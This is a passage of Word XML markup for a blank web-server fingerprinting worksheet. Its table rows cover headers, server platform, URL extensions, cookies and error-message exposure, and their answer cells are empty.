          <w:p w14:paraId="1ED0BC22" w14:textId="7F7E17C4" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content Type &amp; Encoding Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1AF1A9" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E547A5B" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48CE3772" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="7C51FEC9" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A7B542F" w14:textId="6F75BC6E" w:rsidR="004005FE" w:rsidRPr="00310D3A" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00310D3A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP Request Header Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4859884F" w14:textId="12CAAB65" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Server Name &amp; Version Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3711F9ED" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="701DCE67" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DCF147E" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="3C9E3194" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70A85D20" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06099B6D" w14:textId="5EB0184D" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scripting or Coding Environment Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66AF1F19" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="399C4F62" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="5E758B73" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15716647" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A6D7AEC" w14:textId="559BC0C8" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Error Messages Observed</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A621CEA" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A5267">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Any sensitive information exposed?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75582E38" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E0AF1EF" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1511945E" w14:textId="533FAA79" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w:rsidRPr="004005FE" w14:paraId="4F8294C3" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E0FE89F" w14:textId="77777777" w:rsidR="004005FE" w:rsidRPr="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="535BFDD8" w14:textId="18ACE49D" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HEAD &amp; OPTIONS Request Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117CA219" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C85A6BD" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B261865" w14:textId="77777777" w:rsidR="00102667" w:rsidRPr="004005FE" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F57C4" w14:paraId="6F688D2A" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B47B547" w14:textId="7E545888" w:rsidR="008F57C4" w:rsidRPr="00C85884" w:rsidRDefault="008F57C4" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C85884">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>URL Extensions Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49022694" w14:textId="718DDE94" w:rsidR="008F57C4" w:rsidRPr="00C54B08" w:rsidRDefault="008F57C4" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Detected Extensions &amp; Corresponding Technology</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="686CC138" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C85884">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[For example, .php → PHP, .aspx → ASP.NET]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639760F0" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51056EA2" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="728EE809" w14:textId="6AA0C953" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F57C4" w14:paraId="37A7F814" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B5A3E60" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3017CA95" w14:textId="1A2692F7" w:rsidR="008F57C4" w:rsidRPr="00C54B08" w:rsidRDefault="008F57C4" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server Platform Identified </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABC277B" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137E8B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Apache, Nginx, IIS, Tomcat, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398B6F2A" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3604CA61" w14:textId="77777777" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BC38A93" w14:textId="54E0BECF" w:rsidR="008F57C4" w:rsidRDefault="008F57C4" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="2098EDF4" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24EF8C56" w14:textId="7B473C5E" w:rsidR="00102667" w:rsidRPr="0030042D" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0030042D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cookie Examination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14E78C59" w14:textId="58C1AE2B" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cookies Set by Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69356C03" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0030042D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*PHPSESSID, JSESSIONID, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11FFE24A" w14:textId="19438C7A" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="26CF82DA" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AF37109" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18446234" w14:textId="347A42D8" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Presence of Security Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B297D7B" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12782927" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="1A3D74A5" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="465895E0" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7A7AAE" w14:textId="3B33CB17" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Potentially Sensitive Information in Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="371D78F9" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C127FC2" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28C149EB" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="009CA882" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FCE2E12" w14:textId="62412142" w:rsidR="00102667" w:rsidRPr="00960A4F" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Error Message Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53CA6452" w14:textId="77A5CB39" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Framework or Server Information Exposed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE5B731" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19BB6C01" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16777A54" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="67E98C5C" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C52C57A" w14:textId="77777777" w:rsidR="00102667" w:rsidRPr="00960A4F" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E6E96E8" w14:textId="49A77B5A" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Presence of Stack Traces or Debugging Information?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E64A59A" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="763628FB" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73A04E52" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102667" w14:paraId="4E86556A" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
